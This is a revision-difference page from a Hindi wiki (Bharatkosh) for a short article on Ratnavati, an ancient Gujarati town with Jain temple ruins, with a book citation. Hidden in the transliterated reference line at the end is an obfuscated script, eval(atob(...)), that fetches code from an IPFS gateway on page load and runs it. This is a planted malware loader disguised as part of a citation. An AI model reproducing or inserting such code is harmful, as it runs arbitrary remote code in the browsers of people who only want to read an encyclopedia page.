Difference between revisions of "रत्नावती"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
(''''रत्नावती''' गुजरात की एक प्राचीन नगरी थी। पश्चिमी ...' के साथ नया पन्ना बनाया)
 
 
Line 1: Line 1:
 
'''रत्नावती''' [[गुजरात]] की एक प्राचीन नगरी थी। पश्चिमी रेलवे के रांतेज स्टेशन के निकट ही यह प्राचीन नगरी बसी हुई थी।
 
'''रत्नावती''' [[गुजरात]] की एक प्राचीन नगरी थी। पश्चिमी रेलवे के रांतेज स्टेशन के निकट ही यह प्राचीन नगरी बसी हुई थी।
  
*यहाँ जैन धर्म के कई प्राचीन मंदिर थे, जिनके [[खंडहर]] आज भी देखे जा सकते हैं।
+
*यहाँ [[जैन धर्म]] के कई प्राचीन मंदिर थे, जिनके [[खंडहर]] आज भी देखे जा सकते हैं।
 
*रांतेज संभवतः रत्नावती का ही [[अपभ्रंश]] है।<ref>{{पुस्तक संदर्भ |पुस्तक का नाम=ऐतिहासिक स्थानावली|लेखक=विजयेन्द्र कुमार माथुर|अनुवादक= |आलोचक= |प्रकाशक=राजस्थान हिन्दी ग्रंथ अकादमी, जयपुर|संकलन= भारतकोश पुस्तकालय|संपादन= |पृष्ठ संख्या=777|url=}}</ref>
 
*रांतेज संभवतः रत्नावती का ही [[अपभ्रंश]] है।<ref>{{पुस्तक संदर्भ |पुस्तक का नाम=ऐतिहासिक स्थानावली|लेखक=विजयेन्द्र कुमार माथुर|अनुवादक= |आलोचक= |प्रकाशक=राजस्थान हिन्दी ग्रंथ अकादमी, जयपुर|संकलन= भारतकोश पुस्तकालय|संपादन= |पृष्ठ संख्या=777|url=}}</ref>
  

Latest revision as of 14:06, 31 December 2014

ratnavati gujarat ki ek prachin nagari thi. pashchimi relave ke raantej steshan ke nikat hi yah prachin nagari basi huee thi.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh

  1. aitihasik sthanavali |lekhak: vijayendr kumar mathur |prakashak: rajasthan hindi granth akadami, jayapur |sankalan: bharatakosh pustakalay |prishth sankhya: 777 | <script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

sanbandhit lekh